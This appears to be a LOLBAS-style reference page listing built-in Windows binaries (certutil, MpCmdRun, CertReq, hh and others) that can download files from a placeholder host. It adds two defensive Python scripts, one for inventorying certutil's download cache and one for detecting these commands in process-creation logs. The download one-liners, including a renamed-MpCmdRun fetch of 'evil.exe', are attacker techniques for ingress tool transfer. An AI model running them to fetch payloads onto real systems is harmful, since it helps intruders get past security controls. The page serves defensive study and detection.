Secondary Categories: 02 - Command and Control

AppInstaller

Path:

  • C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
start ms-appinstaller://?source=https://www.example.org/file.exe

Curl

Download the file (the body is written to stdout unless -o/-O is given)

curl https://www.digitalocean.com/robots.txt

Download with a specific file name

curl -o do-bots.txt https://www.digitalocean.com/robots.txt

Download and follow redirects (-L follows 3xx responses; -I on its own only fetches the headers and saves nothing)

curl -L -O https://www.digitalocean.com/robots.txt

Download with basic or bearer-token authentication

curl -u username:password -O https://example.com/securefile.zip
curl -H "Authorization: Bearer YOUR_TOKEN" -O https://api.example.com/protected/data.json

CertOC

Path:

  • c:\windows\system32\certoc.exe
  • c:\windows\syswow64\certoc.exe
certoc.exe -GetCACAPS https://www.example.org/file.ps1

CertReq

Path:

  • C:\Windows\System32\certreq.exe
  • C:\Windows\SysWOW64\certreq.exe
CertReq -Post -config https://www.example.org/file.ext C:\Windows\Temp\file.ext file.txt

CertUtil

Path:

  • C:\Windows\System32\certutil.exe
  • C:\Windows\SysWOW64\certutil.exe

Download and save to disk

certutil.exe -urlcache -f https://www.example.org/file.exe file.exe

Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.

certutil.exe -verifyctl -f https://www.example.org/file.exe file.exe

Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].

certutil.exe -URL https://www.example.org/file.exe
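
The three certutil variants above all leave a copy of the fetched file under %LOCALAPPDATA%Low\Microsoft\CryptnetUrlCache, even when -f or an explicit output path is used. The script below is an added example (not part of the original page or of certutil) for inventorying that cache during triage. It assumes only what the page states plus two things about the cache: the MetaData and Content directories hold files with the same hash-style name, and the MetaData record stores the fetched URL as UTF-16LE text. It does not parse the record layout; the URL is recovered by scanning for UTF-16LE text that begins with a URL scheme, which is a heuristic, not a format specification. The fixture it builds is constructed sample data so it runs offline.

```python
"""Inventory the CryptnetUrlCache that certutil -urlcache / -verifyctl / -URL write to.

Added example, not from the original page. Assumptions: MetaData and Content
hold same-named files; the MetaData record contains the URL as UTF-16LE text.
The URL is located by a byte-pattern scan, not by parsing the record layout.
"""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import List

# UTF-16LE "http://", "https://" or "ftp://" followed by printable ASCII characters.
URL_UTF16_RE = re.compile(
    rb"(?:h\x00t\x00t\x00p\x00(?:s\x00)?|f\x00t\x00p\x00):\x00/\x00/\x00(?:[\x21-\x7e]\x00)+"
)


def default_cache_dir() -> Path:
    """Per-user cache under AppData\\LocalLow, i.e. the %LOCALAPPDATA%Low path named above."""
    return Path.home() / "AppData" / "LocalLow" / "Microsoft" / "CryptnetUrlCache"


def extract_urls(blob: bytes) -> List[str]:
    """Heuristic: every UTF-16LE run that starts with a scheme is reported as a URL."""
    return [m.group(0).decode("utf-16-le") for m in URL_UTF16_RE.finditer(blob)]


def inventory(cache_dir: Path) -> List[dict]:
    """One record per MetaData file, paired with the Content file of the same name."""
    meta_dir, content_dir = cache_dir / "MetaData", cache_dir / "Content"
    if not meta_dir.is_dir():
        return []
    entries = []
    for meta in sorted(meta_dir.iterdir()):
        if not meta.is_file():
            continue
        entry = {"name": meta.name, "urls": extract_urls(meta.read_bytes()),
                 "content_present": False, "size": None, "sha256": None, "is_pe": False}
        content = content_dir / meta.name
        if content.is_file():
            data = content.read_bytes()
            # An MZ header in the cache is a strong hint that -urlcache fetched an executable.
            entry.update(content_present=True, size=len(data),
                         sha256=hashlib.sha256(data).hexdigest(), is_pe=data[:2] == b"MZ")
        entries.append(entry)
    return entries


def build_fixture(root: Path) -> Path:
    """Constructed sample cache (not real Windows data) so the script runs offline."""
    cache = root / "CryptnetUrlCache"
    (cache / "MetaData").mkdir(parents=True, exist_ok=True)
    (cache / "Content").mkdir(parents=True, exist_ok=True)
    name = "3A1F0C2B9E8D7A6B5C4D3E2F1A0B9C8D"  # made-up hash-style file name
    url = "https://www.example.org/file.exe"   # the URL from the certutil commands above
    # Opaque leading bytes, the URL in UTF-16LE, then a terminator.
    (cache / "MetaData" / name).write_bytes(b"\x00" * 12 + url.encode("utf-16-le") + b"\x00\x00")
    (cache / "Content" / name).write_bytes(b"MZ\x90\x00" + b"\x00" * 60)
    return cache


def demo() -> List[dict]:
    """Build the constructed fixture in a temporary directory and inventory it."""
    with tempfile.TemporaryDirectory() as tmp:
        return inventory(build_fixture(Path(tmp)))


if __name__ == "__main__":
    for e in inventory(default_cache_dir()) or demo():
        print(e["name"], e["urls"], "PE" if e["is_pe"] else "", e["size"], e["sha256"])
```

On a live host, run it as the user whose certutil invocation you are investigating, since the cache is per-user; also check the SYSTEM profile's LocalLow directory for service-context executions, and treat an empty cache as weak evidence, because the cache can be cleared by the same binary.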

Cmdl32

Path:

  • C:\Windows\System32\cmdl32.exe
  • C:\Windows\SysWOW64\cmdl32.exe
cmdl32 /vpn /lan %cd%\config

ConfigSecurityPolicy

Path:

  • C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
ConfigSecurityPolicy.exe https://www.example.org/file.ext

Desktopimgdownldr

Path:

  • c:\windows\system32\desktopimgdownldr.exe
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://www.example.org/file.ext /eventName:desktopimgdownldr

Hh.exe

Path:

  • C:\Windows\hh.exe
  • C:\Windows\SysWOW64\hh.exe
HH.exe https://www.example.org/file.bat

IMEWDBLD

Path:

  • C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://www.example.org/file.ext

Ldifde

Path:

  • c:\windows\system32\ldifde.exe
  • c:\windows\syswow64\ldifde.exe
Ldifde -i -f file.ldf

MpCmdRun

Path:

  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
  • C:\Program Files\Windows Defender\MpCmdRun.exe
  • C:\Program Files (x86)\Windows Defender\MpCmdRun.exe
  • C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\X86\MpCmdRun.exe
copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://www.example.org/file.exe -path C:\Users\Public\Downloads\evil.exe
MpCmdRun.exe -DownloadFile -url https://www.example.org/file.exe -path C:\Windows\Temp\file.exe

MsoHtmEd

Path:

  • C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
  • C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
  • C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
  • C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
  • C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
  • C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
  • C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
  • C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
  • C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
MsoHtmEd.exe https://www.example.org/file.ext

ProtocolHandler

Path:

  • C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe
  • C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe
  • C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe
  • C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe
  • C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe
  • C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe
  • C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe
  • C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe
ProtocolHandler.exe https://www.example.org/file.ext

Powershell

Invoke-WebRequest -URI $URL -OutFile $Path
(New-Object System.Net.WebClient).DownloadFile($URL, $Path)
Start-BitsTransfer -Source $URL -Destination $Path
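
Every entry on this page is a process-creation event with a recognizable binary name, flag or URL on the command line, so the whole list can be turned into one detection rule set. The script below is an added example (not part of the original page or any vendor product) that runs such a rule set over constructed sample events shaped like Sysmon Event ID 1 records (Image, OriginalFileName, CommandLine). The binary names and flags come from the commands above; the regexes, rule names and the sample events are this example's own assumptions. It also covers the MpCmdRun copy-and-rename trick shown above by matching on OriginalFileName, which Sysmon takes from the PE version resource and which survives renaming.

```python
"""Flag LOLBin-style download activity in process-creation events.

Added example, not part of the original page. Rule regexes and sample events
are this example's assumptions, distilled from the commands listed above.
"""
import re
from dataclasses import dataclass
from typing import FrozenSet, Iterable, List, Optional

URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://[^\s\"'<>]+")


@dataclass(frozen=True)
class Rule:
    name: str
    binaries: Optional[FrozenSet[str]]  # None: judge the command line alone
    pattern: Optional[str]              # extra regex the command line must match
    needs_url: bool                     # require an http(s)/ftp URL on the command line


@dataclass
class Finding:
    rule: str
    image: str
    url: Optional[str]
    command_line: str


RULES = [
    Rule("CertUtil URL fetch", frozenset({"certutil.exe"}), r"(?i)-(urlcache|verifyctl|url)\b", True),
    Rule("CertReq -Post", frozenset({"certreq.exe"}), r"(?i)-post\b", True),
    Rule("CertOC -GetCACAPS", frozenset({"certoc.exe"}), r"(?i)-getcacaps\b", True),
    Rule("MpCmdRun -DownloadFile", frozenset({"mpcmdrun.exe"}), r"(?i)-downloadfile\b", True),
    Rule("Desktopimgdownldr lockscreen URL", frozenset({"desktopimgdownldr.exe"}), r"(?i)/lockscreenurl:", True),
    # cmdl32 takes a profile file, so the URL is not on the command line.
    Rule("Cmdl32 VPN profile fetch", frozenset({"cmdl32.exe"}), r"(?i)/vpn\b", False),
    Rule("Office/Defender/IME helper given a URL",
         frozenset({"configsecuritypolicy.exe", "imewdbld.exe", "hh.exe",
                    "msohtmed.exe", "protocolhandler.exe"}), None, True),
    Rule("curl download", frozenset({"curl.exe"}), None, True),
    Rule("PowerShell web download", frozenset({"powershell.exe", "pwsh.exe"}),
         r"(?i)(invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer)", True),
    # The ms-appinstaller: URI is usually launched via cmd/explorer, so match on content only.
    Rule("AppInstaller ms-appinstaller: URI", None, r"(?i)ms-appinstaller://", True),
]


def _binary_names(event: dict) -> set:
    """Names to match: the on-disk file name plus OriginalFileName, which survives renaming."""
    names = {event.get("Image", "").rsplit("\\", 1)[-1].lower()}
    if event.get("OriginalFileName"):
        names.add(event["OriginalFileName"].lower())
    return names


def scan_event(event: dict) -> List[Finding]:
    cmd = event.get("CommandLine", "")
    names = _binary_names(event)
    url = URL_RE.search(cmd)
    hits = []
    for rule in RULES:
        if rule.binaries is not None and not (rule.binaries & names):
            continue
        if rule.pattern and not re.search(rule.pattern, cmd):
            continue
        if rule.needs_url and url is None:
            continue
        hits.append(Finding(rule.name, event.get("Image", ""), url.group(0) if url else None, cmd))
    return hits


def scan(events: Iterable[dict]) -> List[Finding]:
    return [f for e in events for f in scan_event(e)]


# Constructed sample events (not real telemetry); the third one is benign certutil use.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache -f https://www.example.org/file.exe file.exe"},
    {"Image": r"C:\Users\Public\Downloads\MP.exe", "OriginalFileName": "MpCmdRun.exe",
     "CommandLine": r'"C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://www.example.org/file.exe -path C:\Users\Public\Downloads\evil.exe'},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Windows\Temp\setup.msi SHA256"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd /c start ms-appinstaller://?source=https://www.example.org/file.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -nop -c \"(New-Object System.Net.WebClient).DownloadFile('https://www.example.org/a.ps1','C:\\Users\\Public\\a.ps1')\""},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] image={f.image} url={f.url}")
```

Two caveats when wiring this to real telemetry: Security event 4688 only carries the command line if the "Include command line in process creation events" policy is enabled, and it has no OriginalFileName field, so the renamed-MpCmdRun case is only caught from Sysmon or an EDR that records PE version metadata. The curl and PowerShell rules will fire on routine administration; scope them by parent process or user rather than dropping them.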

Resources: